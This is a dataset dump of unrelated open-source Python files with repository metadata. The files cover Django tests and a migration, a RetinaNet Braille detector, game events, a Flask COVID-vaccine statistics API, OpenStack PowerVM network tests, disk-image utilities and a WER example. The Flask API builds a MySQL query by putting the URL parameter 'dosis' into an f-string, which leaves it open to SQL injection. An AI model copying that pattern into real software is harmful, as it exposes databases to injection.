max_stars_repo_path stringlengths 3-269 | max_stars_repo_name stringlengths 4-119 | max_stars_count int64 0-191k | id stringlengths 1-7 | content stringlengths 6-1.05M | score float64 0.23-5.13 | int_score int64 0-5 |
---|---|---|---|---|---|---|
contenido/tests/HU028_test.py | slinan/border | 0 | 12786451 | from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from contenido.models import Audio
# Create your tests here.
class ContenidoTests(TestCase):
def setUp(self):
# Every test needs access to the request factory.
user = User.objects.create_user(
username='userTest', email='<EMAIL>', password='<PASSWORD>')
audio = Audio()
audio.nom_audio = "song1"
audio.val_recurso = "http://la...."
audio.fec_entrada_audio = "2016-10-08"
audio.save()
audio.likes.add(User.objects.get(id=user.id))
audio.save()
def test_unlike_view(self):  # prefixed with "test_" so the Django test runner discovers it
audio = Audio.objects.get(pk=1)
total_likes_before = audio.likes.count()
c = Client()
response = c.post('/unlike/', {'song_id': 1})
audio = Audio.objects.get(pk=1)
audio.likes.remove(User.objects.get(id=1))
total_likes_after = audio.likes.count()
self.assertEqual(response.status_code, 200)
self.assertEqual(total_likes_after, total_likes_before - 1)
| 2.484375 | 2 |
model/create_model_retinanet.py | Abdumaleek/SDK | 1 | 12786452 | import os
import torch
import numpy as np
from pytorch_retinanet.loss import FocalLoss
from pytorch_retinanet.retinanet import RetinaNet
from pytorch_retinanet.encoder import DataEncoder
import local_config
from braille_utils import label_tools
def create_model_retinanet(params, device):
'''
Creates model and auxiliary functions
:param params: OvoTools.AttrDict with parameters
:param device: 'cuda'/'cpu'
:return: model, detection_collate function, loss function
'''
use_multiple_class_groups = params.data.get('class_as_6pt', False)
num_classes = 1 if params.data.get_points else ([1]*6 if use_multiple_class_groups else 64)
encoder = DataEncoder(**params.model_params.encoder_params)
model = RetinaNet(num_layers=encoder.num_layers(), num_anchors=encoder.num_anchors(),
num_classes=num_classes,
num_fpn_layers=params.model_params.get('num_fpn_layers', 0)).to(device)
retina_loss = FocalLoss(num_classes=num_classes, **params.model_params.get('loss_params', dict()))
def detection_collate(batch):
'''
:param batch: list of (tb image(CHW float), [(left, top, right, bottom, class),...]), coords in [0,1], extra_params
:return: batch: ( images (BCNHW), ( encoded_rects, encoded_labels ) )
copied from RetinaNet, but a) accepts rects as input, b) returns (x,y) where y = (encoded_rects, encoded_labels)
'''
# t = [b for b in batch if b[1].shape[0]==0]
# if len(t):
# pass
#device = torch.device('cpu') # commented to use settings.device
boxes = [torch.tensor(b[1][:, :4], dtype = torch.float32, device=device)
*torch.tensor(params.data.net_hw[::-1]*2, dtype = torch.float32, device=device) for b in batch]
labels = [torch.tensor(b[1][:, 4], dtype = torch.long, device=device) for b in batch]
if params.data.get_points:
labels = [torch.tensor([0]*len(lb), dtype = torch.long, device=device) for lb in labels]
elif use_multiple_class_groups:
# classes are numbered from 0, a missing class is -1; later in encode, cls_targets=1+labels
labels = [torch.tensor([[int(ch)-1 for ch in label_tools.int_to_label010(int_lbl.item())] for int_lbl in lb],
dtype=torch.long, device=device) for lb in labels]
original_images = [b[3] for b in batch if len(b)>3] # batch contains augmented image if not in train mode
imgs = [x[0] for x in batch]
calc_cls_mask = torch.tensor([b[2].get('calc_cls', True) for b in batch],
dtype=torch.bool,
device=device)
h, w = tuple(params.data.net_hw)
num_imgs = len(batch)
inputs = torch.zeros(num_imgs, 3, h, w).to(imgs[0])
loc_targets = []
cls_targets = []
for i in range(num_imgs):
inputs[i] = imgs[i]
labels_i = labels[i]
if use_multiple_class_groups and len(labels_i.shape) != 2: # it can happen if no labels are on image
labels_i = labels_i.reshape((0, len(num_classes)))
loc_target, cls_target, max_ious = encoder.encode(boxes[i], labels_i, input_size=(w,h))
loc_targets.append(loc_target)
cls_targets.append(cls_target)
if original_images: # inference mode
return inputs, ( torch.stack(loc_targets), torch.stack(cls_targets), calc_cls_mask), original_images
else:
return inputs, (torch.stack(loc_targets), torch.stack(cls_targets), calc_cls_mask)
class Loss:
def __init__(self):
self.encoder = encoder
pass
def __call__(self, pred, targets):
loc_preds, cls_preds = pred
loc_targets, cls_targets, calc_cls_mask = targets
if calc_cls_mask.min(): # nothing is skipped, so no mask is needed
calc_cls_mask = None
loss = retina_loss(loc_preds, loc_targets, cls_preds, cls_targets, cls_calc_mask=calc_cls_mask)
return loss
def get_dict(self, *kargs, **kwargs):
return retina_loss.loss_dict
def metric(self, key):
def call(*kargs, **kwargs):
return retina_loss.loss_dict[key]
return call
return model, detection_collate, Loss()
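# Hedged usage sketch (not part of the original module): how the returned triple
# might be consumed. `params` and `batch` are assumptions following the docstrings
# above, and the RetinaNet forward pass is assumed to return (loc_preds, cls_preds)
# as the Loss class expects.
def _example_training_step(params, batch, device='cuda'):
    model, collate_fn, loss_fn = create_model_retinanet(params, device)
    inputs, targets = collate_fn(batch)  # targets = (loc_targets, cls_targets, calc_cls_mask)
    return loss_fn(model(inputs), targets)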
if __name__ == '__main__':
pass
| 2.15625 | 2 |
bomberman/model/events.py | raphaelreme/bomberman | 0 | 12786453 | <reponame>raphaelreme/bomberman<filename>bomberman/model/events.py<gh_stars>0
"""All the events used by the model based on the observer/observable event."""
from __future__ import annotations
from . import entity
from ..designpattern.event import Event
class MazeStartEvent(Event):
"""At each new maze"""
class MazeEndEvent(Event):
"""When a maze is released"""
class GameEndEvent(Event):
"""When the game is done"""
class StartScreenEvent(Event):
"""At the beginning of each start screen"""
class ForwardStartScreenEvent(Event):
"""Could be used to update the start screen"""
class BonusScreenEvent(Event):
"""At the beginning of each bonus screen"""
class ForwardBonusScreenEvent(Event):
"""Could be used to update the bonus screen (animation ?)"""
class MazeFailedEvent(Event):
"""When the maze is detected as failed"""
class MazeSolvedEvent(Event):
"""When the maze is detected as solved"""
class MazeEndingEvent(Event):
"""Each update of the maze, when it is ending"""
class ExtraGameEvent(Event):
"""At the beginning of the extra game"""
class HurryUpEvent(Event):
"""30s before time's up"""
class ForwardTimeEvent(Event):
"""Notify the view of a progress in time"""
def __init__(self, delay: float) -> None:
super().__init__()
self.delay = delay
class EntityEvent(Event):
def __init__(self, entity_: entity.Entity):
super().__init__()
self.entity = entity_
class NewEntityEvent(EntityEvent):
pass
class MovedEntityEvent(EntityEvent):
pass
class HitEntityEvent(EntityEvent):
pass
class RemovingEntityEvent(EntityEvent):
"""Each time the entity is removing"""
class RemovedEntityEvent(EntityEvent):
pass
class LifeLossEvent(EntityEvent):
"""When a player loses a life (after its removing delay)"""
class PlayerDetailsEvent(EntityEvent):
"""When a player's details have to be updated"""
class NoiseEvent(EntityEvent):
"""At each entity noise (Not all sounds)"""
class StartRemovingEvent(EntityEvent):
"""when the entity reaches removing state"""
class ScoreEvent(EntityEvent):
"""When score is earned
Will trigger a score slider (Notified by the entity as a change of the maze)
"""
class ExtraLifeEvent(EntityEvent):
"""When a player completed EXTRA letters
Will trigger a slider (Notified by the player as a change of the maze)
"""
def __init__(self, entity_: entity.Entity):
super().__init__(entity_)
self.entity: entity.Player
| 2.8125 | 3 |
aashe_bulletin/migrations/0001_use_ulysses_for_historical_issues.py | AASHE/aashe-bulletin | 0 | 12786454 | <reponame>AASHE/aashe-bulletin
# -*- coding: utf-8 -*-
"""For all extant issues, use 'ulysses.html' for the HTML template.
Previous templates expect one Category per Post; ulysses.html handles
multiple Categories per Post.
Since supporting multiple Categories per Post required a schema
change, historical HTML templates won't work even for historical Issues.
"""
from __future__ import unicode_literals
from django.db import migrations
def update_issues(apps, schema_editor):
Issue = apps.get_model("bulletin", "Issue")
for issue in Issue.objects.all():
if issue.html_template_name: # Many old Issues have no HTML template.
issue.html_template_name = "email_templates/ulysses.html"
issue.save()
class Migration(migrations.Migration):
dependencies = [
("bulletin", "0005_delete_post_field_category")
]
operations = [
migrations.RunPython(update_issues)
]
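# Hedged note (not part of the original migration): RunPython is given no reverse
# function here, so migrating backwards past this migration raises IrreversibleError
# unless a no-op reverse (migrations.RunPython.noop) is added.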
| 1.984375 | 2 |
api/main.py | manucabral/CODAVI | 11 | 12786455 | <filename>api/main.py
import pandas as pd
import matplotlib.pyplot as plt
import mysql.connector
import base64
import io
from flask import Flask
from datetime import datetime
app = Flask(__name__)
FECHA_ACTUAL = datetime.now().date().isoformat()
def obtenerDatosVacuna():
try:
url = 'https://sisa.msal.gov.ar/datos/descargas/covid-19/files/Covid19VacunasAgrupadas.csv.zip'
data = pd.read_csv(url)
except Exception as Error:
print('Hubo un error al leer el dataset', Error)
raise  # re-raise: `data` is undefined below if the download failed
sputnik = data.query('vacuna_nombre.str.contains("Sputnik")')
astrazeneca = data.query('vacuna_nombre.str.contains("AstraZeneca")')
sinopharm = data.query('vacuna_nombre.str.contains("Sinopharm")')
covishield = data.query('vacuna_nombre.str.contains("COVISHIELD")')
moderna = data.query('vacuna_nombre.str.contains("Moderna")')
return sputnik, astrazeneca, sinopharm, covishield, moderna
def obtenerDatosGenero(dosis):
try:
cnx = mysql.connector.connect(
host="desconocido",
port=3306,
user="desconocido",
password="<PASSWORD>",
db="desconocido"
)
cursor = cnx.cursor()
except Exception:
return {
"status": 204,
"titulo": f"Comparativa por género dosis {dosis}",
"data": "No hay datos"}
query = (
f"SELECT masculino, femenino, fecha FROM `x3lh5zri57nk7is6`.`generos` WHERE dosis = '{dosis}' and fecha = '{FECHA_ACTUAL}';")
cursor.execute(query)
result = cursor.fetchall()
if len(result) == 0:
return {
"status": 204,
"titulo": f"Comparativa por género dosis {dosis}",
"data": "No hay datos actualizados para hoy."}
cantidadMasculino, cantidadFemenino, fecha = result[0]
cursor.close()
cnx.close()
return {
"status": 200,
"titulo": f"Comparativa por género dosis {dosis}",
"descripcion": f'Cantidad de vacunados por género en la DOSIS {dosis}',
"fecha": str(fecha),
"dosis": f"{dosis}",
"data": {
"masculino": {
"nombre": "Masculino",
"total": int(cantidadMasculino),
},
"femenino": {
"nombre": "Femenino",
"total": int(cantidadFemenino)
}
}
}
@app.errorhandler(404)
def page_not_found(e):
return "La ruta que buscas no existe."
@app.route('/', methods=['GET'])
def index():
return "Bienvenido a la API de Codavi."
@app.route('/vacunas/<dosis>', methods=['GET'])
def vacunas(dosis):
titulo = None
descripcion = None
objetivo_dosis = None
sputnik, astrazeneca, sinopharm, covishield, moderna = obtenerDatosVacuna()
if int(dosis) == 1:
titulo = 'Vacunas aplicadas en la primera dosis'
descripcion = "Cantidad de vacunas aplicadas por marca en la primera dosis"
objetivo_dosis = 'primera_dosis_cantidad'
elif int(dosis) == 2:
titulo = 'Vacunas aplicadas en la segunda dosis'
descripcion = "Cantidad de vacunas aplicadas por marca en la segunda dosis"
objetivo_dosis = 'segunda_dosis_cantidad'
sputnik_total = sputnik[objetivo_dosis].sum()
astrazeneca_total = astrazeneca[objetivo_dosis].sum()
sinopharm_total = sinopharm[objetivo_dosis].sum()
covishield_total = covishield[objetivo_dosis].sum()
moderna_total = moderna[objetivo_dosis].sum()
total = sputnik_total + astrazeneca_total + \
sinopharm_total + covishield_total + moderna_total
x = ['Sputnik', 'AstraZeneca', 'Sinopharm', 'Covishield', 'Moderna']
y = [sputnik_total, astrazeneca_total,
sinopharm_total, covishield_total, moderna_total]
plt.bar(x, y, color='green')
plt.ylabel('Cantidad')
plt.xlabel('Marca')
plt.title(titulo)
img = io.BytesIO()
plt.savefig(img, format='png', bbox_inches="tight")
plt.close()
img = base64.b64encode(img.getvalue()).decode("utf-8").replace("\n", "")
return {
"status": 200,
"titulo": titulo,
"descripcion": descripcion,
"total": int(total),
"grafico": img,
"data": {
"Sputnik": {
"nombre": "Sputnik",
"total": int(sputnik_total)
},
"AstraZeneca": {
"nombre": "AstraZeneca",
"total": int(astrazeneca_total)
},
"Sinopharm": {
"nombre": "Sinopharm",
"total": int(sinopharm_total)
},
"Covishield": {
"nombre": "Covishield",
"total": int(covishield_total)
},
"Moderna": {
"nombre": "Moderna",
"total": int(moderna_total)
}
}
}
@app.route('/genero/<dosis>', methods=['GET'])
def genero(dosis=0):
return obtenerDatosGenero(dosis)
| 3.046875 | 3 |
vcflat/tests/test_HeaderExtraction/test_populatevcfheader.py | arontommi/VCFlat | 4 | 12786456 | <gh_stars>1-10
import os
from vcflat.HeaderExtraction import VcfHeader
def get_input(samples_in_header=None):
test_data_dir = os.path.join(os.path.dirname(__file__), "..", "test_data")
i = os.path.join(test_data_dir, "test.snpeff.vcf")
vcfh = VcfHeader(i, samples_in_header=samples_in_header)
return vcfh
def test_1():
""" checks that output is list """
assert type(get_input().header) is list
def test_2():
""" checks that output not empty """
assert get_input().header is not None
def test_3():
checklist = [
"#CHROM",
"POS",
"ID",
"REF",
"ALT",
"QUAL",
"FILTER",
"INFO",
"FORMAT",
]
""" checks if correct things are in the header """
assert all(i in get_input().header for i in checklist)
def test_4():
checklist = [
"#CHROM",
"POS",
"ID",
"REF",
"ALT",
"QUAL",
"FILTER",
"INFO",
"FORMAT",
"1",
"2",
"3",
"4",
]
assert all(i in get_input(samples_in_header="1 2 3 4").header for i in checklist)
| 2.46875 | 2 |
nova_powervm/tests/virt/powervm/tasks/test_network.py | UbuntuEvangelist/nova-powervm | 0 | 12786457 | # Copyright 2015 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import mock
from nova import exception
from nova import objects
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from nova_powervm.tests.virt import powervm
from nova_powervm.virt.powervm.tasks import network as tf_net
def cna(mac):
"""Builds a mock Client Network Adapter for unit tests."""
nic = mock.MagicMock()
nic.mac = mac
nic.vswitch_uri = 'fake_href'
return nic
class TestNetwork(test.TestCase):
def setUp(self):
super(TestNetwork, self).setUp()
self.apt = self.useFixture(pvm_fx.AdapterFx()).adpt
self.mock_lpar_wrap = mock.MagicMock()
self.mock_lpar_wrap.can_modify_io.return_value = True, None
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_unplug_vifs(self, mock_vm_get):
"""Tests that a delete of the vif can be done."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. One should already exist, the other
# should not.
cnas = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11'), cna('AABBCCDDEE22')]
mock_vm_get.return_value = cnas
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:22'},
{'address': 'aa:bb:cc:dd:ee:33'}
]
# Run method
p_vifs = tf_net.UnplugVifs(self.apt, inst, net_info, 'host_uuid')
p_vifs.execute(self.mock_lpar_wrap)
# The delete should have only been called once. The second CNA didn't
# have a matching mac...so it should be skipped.
self.assertEqual(1, cnas[0].delete.call_count)
self.assertEqual(0, cnas[1].delete.call_count)
self.assertEqual(1, cnas[2].delete.call_count)
def test_unplug_vifs_invalid_state(self):
"""Tests that the delete raises an exception if bad VM state."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock that the state is incorrect
self.mock_lpar_wrap.can_modify_io.return_value = False, 'bad'
# Run method
p_vifs = tf_net.UnplugVifs(self.apt, inst, mock.Mock(), 'host_uuid')
self.assertRaises(tf_net.VirtualInterfaceUnplugException,
p_vifs.execute, self.mock_lpar_wrap)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_rmc(self, mock_vm_get, mock_vm_crt):
"""Tests that a crt vif can be done with secure RMC."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. One should already exist, the other
# should not.
mock_vm_get.return_value = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11')]
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:22'},
{'address': 'aa:bb:cc:dd:ee:33'}
]
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
p_vifs.execute(self.mock_lpar_wrap)
# The create should have only been called once.
self.assertEqual(2, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_rmc_no_create(self, mock_vm_get, mock_vm_crt):
"""Verifies if no creates are needed, none are done."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Both should already exist.
mock_vm_get.return_value = [cna('AABBCCDDEEFF'), cna('AABBCCDDEE11')]
# Mock up the network info. This also validates that they will be
# sanitized to upper case.
net_info = [
{'address': 'aa:bb:cc:dd:ee:ff'}, {'address': 'aa:bb:cc:dd:ee:11'}
]
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
resp = p_vifs.execute(self.mock_lpar_wrap)
# The create should not have been called. The response should have
# been empty.
self.assertEqual(0, mock_vm_crt.call_count)
self.assertEqual([], resp)
# State check shouldn't have even been invoked as no creates were
# required
self.assertEqual(0, self.mock_lpar_wrap.can_modify_io.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_invalid_state(self, mock_vm_get, mock_vm_crt):
"""Tests that a crt_vif fails when the LPAR state is bad."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Only doing one for simplicity
mock_vm_get.return_value = []
net_info = [{'address': 'aa:bb:cc:dd:ee:ff'}]
# Mock that the state is incorrect
self.mock_lpar_wrap.can_modify_io.return_value = False, 'bad'
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
self.assertRaises(exception.VirtualInterfaceCreateException,
p_vifs.execute, self.mock_lpar_wrap)
# The create should not have been invoked
self.assertEqual(0, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_vifs_timeout(self, mock_vm_get, mock_vm_crt):
"""Tests that crt vif failure via loss of neutron callback."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the CNA response. Only doing one for simplicity
mock_vm_get.return_value = [cna('AABBCCDDEE11')]
# Mock up the network info.
net_info = [{'address': 'aa:bb:cc:dd:ee:ff'}]
# Ensure that an exception is raised by a timeout.
mock_vm_crt.side_effect = eventlet.timeout.Timeout()
# Run method
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
self.assertRaises(exception.VirtualInterfaceCreateException,
p_vifs.execute, self.mock_lpar_wrap)
# The create should have only been called once.
self.assertEqual(1, mock_vm_crt.call_count)
@mock.patch('nova_powervm.virt.powervm.vm.crt_secure_rmc_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_secure_rmc_vswitch')
@mock.patch('nova_powervm.virt.powervm.vm.crt_vif')
@mock.patch('nova_powervm.virt.powervm.vm.get_cnas')
def test_plug_mgmt_vif(self, mock_vm_get, mock_vm_crt,
mock_get_rmc_vswitch, mock_crt_rmc_vif):
"""Tests that a mgmt vif can be created."""
inst = objects.Instance(**powervm.TEST_INSTANCE)
# Mock up the rmc vswitch
vswitch_w = mock.MagicMock()
vswitch_w.href = 'fake_mgmt_uri'
mock_get_rmc_vswitch.return_value = vswitch_w
# Run method
p_vifs = tf_net.PlugMgmtVif(self.apt, inst, 'host_uuid')
p_vifs.execute([])
# The create should have only been called once.
self.assertEqual(1, mock_crt_rmc_vif.call_count)
@mock.patch('nova.utils.is_neutron')
def test_get_vif_events(self, mock_is_neutron):
# Set up common mocks.
inst = objects.Instance(**powervm.TEST_INSTANCE)
net_info = [mock.MagicMock(), mock.MagicMock()]
net_info[0]['id'] = 'a'
net_info[0].get.return_value = False
net_info[1]['id'] = 'b'
net_info[1].get.return_value = True
# Set up the runner.
p_vifs = tf_net.PlugVifs(mock.MagicMock(), self.apt, inst, net_info,
'host_uuid')
# Mock that neutron is off.
mock_is_neutron.return_value = False
self.assertEqual([], p_vifs._get_vif_events())
# Turn neutron on.
mock_is_neutron.return_value = True
resp = p_vifs._get_vif_events()
# Only one should be returned since only one was active.
self.assertEqual(1, len(resp))
| 1.828125 | 2 |
wce_triage/lib/disk_images.py | pfrouleau/wce-triage-v2 | 3 | 12786458 | # Copyright (c) 2019 <NAME>
# MIT license - see LICENSE
"""disk_images scans the disk image candidate directories and returns available disk images for loading.
"""
import os, datetime, json, traceback
from ..lib.util import get_triage_logger, init_triage_logger
tlog = get_triage_logger()
global WCE_IMAGES
WCE_IMAGES = "/usr/local/share/wce/wce-disk-images"
IMAGE_META_JSON_FILE = ".disk_image_type.json"
def set_wce_disk_image_dir(dir):
global WCE_IMAGES
WCE_IMAGES = dir
pass
# gets the potential directories to look for disk images
def get_maybe_disk_image_directories():
global WCE_IMAGES
dirs = []
# No longer look for other directories.
# It would make things rather complicated.
if os.path.exists(WCE_IMAGES) and os.path.isdir(WCE_IMAGES) and WCE_IMAGES not in dirs:
dirs.append(WCE_IMAGES)
pass
return dirs
# gets the potential directories to look for disk images
def get_disk_image_list_order():
global WCE_IMAGES
list_order = {}
if os.path.exists(WCE_IMAGES) and os.path.isdir(WCE_IMAGES):
list_order_path = os.path.join(WCE_IMAGES, ".list-order")
if os.path.exists(list_order_path):
try:
with open(list_order_path) as list_order_fd:
dirs = list_order_fd.readlines()
for i in range(len(dirs)):
list_order[dirs[i].strip()] = i
pass
pass
pass
except:
pass
pass
pass
return list_order
#
#
#
def list_image_files(dirs):
"""lists the image files under the dirs.
:return:
a list of tuples
the shape of tuple: (image_filename, subdir, fullpath)
"""
images = []
for a_dir in dirs:
for direntry in os.listdir(a_dir):
# Anything starting with "." is ignored
if direntry[0:1] == '.':
continue
catalog_dir = os.path.join(a_dir, direntry)
image_meta_file = os.path.join(catalog_dir, IMAGE_META_JSON_FILE)
if not os.path.exists(image_meta_file) or not os.path.isfile(image_meta_file):
continue
if direntry.endswith(".partclone.gz"):
images.append( (direntry, "", catalog_dir) )
pass
if os.path.isdir(catalog_dir):
for direntryinsubdir in os.listdir(catalog_dir):
# Anything starting with "." is ignored
if direntryinsubdir[0:1] == '.':
continue
if direntryinsubdir.endswith(".partclone.gz"):
images.append((direntryinsubdir, direntry, os.path.join(catalog_dir, direntryinsubdir)) )
pass
pass
pass
pass
pass
return images
#
#
#
def get_disk_images(wce_share_url=None):
'''scans the known directories for disk images and returns the list of disk images
:arg:
wce_share_url: prefix for the disk image file.
:returns: list of dict instances.
mtime: file modify time
restoreType: keyword for restore type. [wce|wce-16|triage|clone]
The restore type is nothing more than the name of directory, and
should match exactly to the restore type.
name: filename - this is shown to the user.
size: file size
fullpath: the full path.
..note the entries are deduped by the filename so if two directories
contain the same file name, only one is picked.
'''
# gather disk image files
_images= list_image_files(get_maybe_disk_image_directories())
# Dedup the same file name
images = {}
for image in _images:
fname, subdir, fullpath = image
images[fname] = image
pass
# Sort image listing order
result = []
for filename, image in images.items():
fname, subdir, fullpath = image
filestat = os.stat(fullpath)
mtime = datetime.datetime.fromtimestamp(filestat.st_mtime)
# If wce_share_url is provided, reconstruct the fullpath. HTTP server needs to respond to the route.
if wce_share_url:
fullpath = '{wce_share_url}/wce-disk-images/{restoretype}/{filename}'.format(wce_share_url=wce_share_url, restoretype=subdir, filename=filename)
pass
fattr = { "mtime": mtime.strftime('%Y-%m-%d %H:%M'),
"restoreType" : subdir,
"name": filename,
"fullpath": fullpath,
"size": filestat.st_size,
"subdir": subdir,
"index": len(result) }
result.append(fattr)
pass
list_order = get_disk_image_list_order()
n = len(result)
result.sort(key=lambda x: list_order.get(x["subdir"], len(list_order)) * n + x["index"])
return result
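# Illustrative helper (a hedged example, not part of the original module): consumes
# the dicts documented in get_disk_images() above.
def _print_disk_images(wce_share_url=None):
    for image in get_disk_images(wce_share_url):
        print(image["name"], image["restoreType"], image["size"], image["mtime"])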
def read_disk_image_types(verbose=False):
'''scans the known directories for disk images and returns the list of disk image types
:arg none
:returns: list of dict instances which is .disk_image_type.json file in the directory.
[ { "id": "wce-18",
"filestem": "wce-mate18",
"name": "WCE Ubuntu 18.04LTS",
"timestamp": true,
"efi_image": ".efi-512M.fat32.partclone.gz",
"partition_map": "gpt",
"hostname": "wce",
"randomize_hostname": true,
"cmdline": {
"acpi_enforce_resources": "lax" ,
"nvme_core.default_ps_max_latency_us": "5500"
}
},
{ ... }
]
'''
image_metas = []
for subdir in get_maybe_disk_image_directories():
if verbose:
print("Checking subdir " + subdir)
pass
index = 0
for direntry in os.listdir(subdir):
catalog_dir = os.path.join(subdir, direntry)
image_meta = read_disk_image_type(catalog_dir)
if verbose:
print("Catalog dir " + catalog_dir)
print(image_meta)
pass
if image_meta:
image_meta['index'] = index
image_metas.append(image_meta)
index += 1
pass
pass
pass
list_order = get_disk_image_list_order()
n = len(image_metas)
if list_order:
image_metas.sort(key=lambda x: list_order.get(x["id"], len(list_order)) * n + x['index'])
pass
return image_metas
def read_disk_image_type(catalog_dir):
'''reads the disk image type file from the directory
:arg dir
:returns: a dict instance from the image-meta
'''
result = None
try:
image_meta_file = os.path.join(catalog_dir, IMAGE_META_JSON_FILE)
if not os.path.exists(image_meta_file) or not os.path.isfile(image_meta_file):
return None
with open(image_meta_file) as meta_file:
result = json.load(meta_file)
pass
pass
except json.decoder.JSONDecodeError:
tlog.debug('catalog_dir %s: JSON parse error. Check the contents.' % catalog_dir);
pass
except:
# If anything goes wrong, just ignore the directory.
tlog.debug('catalog_dir %s: %s' % (catalog_dir, traceback.format_exc()))
pass
#
if result:
result["catalogDirectory"] = catalog_dir
pass
return result
def make_disk_image_name(destdir, inname, filesystem='ext4'):
image_meta = read_disk_image_type(destdir)
if image_meta is None:
if inname is None:
exc_msg = "Directory {dir} does not have '{json_file}' file.".format(dir=destdir, json_file=IMAGE_META_JSON_FILE)
raise Exception(exc_msg)
return inname
imagename = image_meta["filestem"]
if not imagename:
imagename = inname
pass
if image_meta.get("timestamp", False):
timestamp = datetime.date.today().isoformat()
imagename = imagename + "-" + timestamp
pass
# Right now, this is making ext4
imagename = imagename + ".%s.partclone.gz" % filesystem
return os.path.join(destdir, imagename)
def get_file_system_from_source(source):
filesystem_ext = None
tail = ".partclone.gz"
if source.endswith(tail):
source = source[:-len(tail)]
else:
return None
try:
filesystem_ext = os.path.splitext(source)[1][1:]
except:
pass
if filesystem_ext in ['ext4', 'ext3', 'fat32', 'vfat', 'fat16']:
return filesystem_ext
return None
def translate_disk_image_name_to_url(wce_share_url, disk_image_name):
for source in get_disk_images(wce_share_url):
if source["name"] == disk_image_name:
return source
pass
return None  # no matching disk image was found
#
if __name__ == "__main__":
print("HELLO")
tlog = init_triage_logger(filename='/tmp/disk_images.log')
print(read_disk_image_types(verbose=True))
print(get_disk_images())
print(get_file_system_from_source("a.ext4.partclone.gz"))
print(get_file_system_from_source("a.ext4.partclone"))
print(get_file_system_from_source("a.partclone.gz"))
print(read_disk_image_type("/usr/local/share/wce/wce-disk-images/triage"))
print("HELLO HELLO")
for disk_image in get_disk_images():
print(translate_disk_image_name_to_url("http://10.3.2.1:8080/wce", disk_image["name"]))
pass
pass
| 2.765625 | 3 |
app/mod_repo/package_manager.py | v-yussupov/hdtapps-prototype | 2 | 12786459 | <reponame>v-yussupov/hdtapps-prototype<filename>app/mod_repo/package_manager.py
import json
import os
from app.mod_repo.models import *
from app.mod_repo.dockerfile_generator import Dockerfile
def read_package_specification(temp_app_dir):
try:
pkg_spec_path = os.path.join(temp_app_dir, "app-spec.json")
with open(pkg_spec_path) as data_file:
data = json.load(data_file)
return data
except Exception as e:
pass
def deserialize_package_specification(temp_app_dir):
try:
pkg_spec_path = os.path.join(temp_app_dir, "app-spec.json")
with open(pkg_spec_path, 'r') as pkg_spec_file:
data = json.load(pkg_spec_file)
obj = dict_to_app_pkg_spec_object(data)
return obj
except Exception as e:
print(e)
def generate_dockerfile(pkg_spec: ApplicationSpecification, path) -> bool:
try:
d = Dockerfile(pkg_spec)
d.save(path)
return True
except:
# TODO: handle exception
return False
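# Hedged usage sketch (not part of the original module; the upload path below is
# hypothetical): read an uploaded app-spec.json and emit a Dockerfile next to it.
if __name__ == "__main__":
    spec = deserialize_package_specification("/tmp/app-upload")
    if spec is not None:
        generate_dockerfile(spec, "/tmp/app-upload")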
| 2.03125 | 2 |
examples/calc_wer.py | jumon/pywer | 2 | 12786460 | import pywer
references = [
"this is a simple python package",
"it calculates word error rate",
"it can also calculate cer",
]
hypotheses = [
"this is the simple python package",
"it calculates word error",
"it can also calculate see er",
]
wer = pywer.wer(references, hypotheses)
cer = pywer.cer(references, hypotheses)
print(f"WER: {wer:.2f}, CER: {cer:.2f}")
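# For reference (standard definitions, not computed in this file):
# WER = (S + D + I) / N, where S, D and I are word substitutions, deletions and
# insertions against the reference and N is the number of reference words;
# CER applies the same formula at the character level.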
| 2.25 | 2 |
fondat/aws/cloudwatch.py | fondat/fondat-aws | 0 | 12786461 | <gh_stars>0
"""Fondat module for AWS CloudWatch."""
import logging
from collections import deque
from collections.abc import Iterable
from datetime import datetime
from fondat.aws import Service
from fondat.data import datacls
from fondat.resource import resource, operation, mutation
from fondat.security import Policy
from typing import Any, Literal, Optional, Union
from fondat.monitoring import Measurement, Counter, Gauge, Absolute
_logger = logging.getLogger(__name__)
Unit = Literal[
"Seconds",
"Microseconds",
"Milliseconds",
"Bytes",
"Kilobytes",
"Megabytes",
"Gigabytes",
"Terabytes",
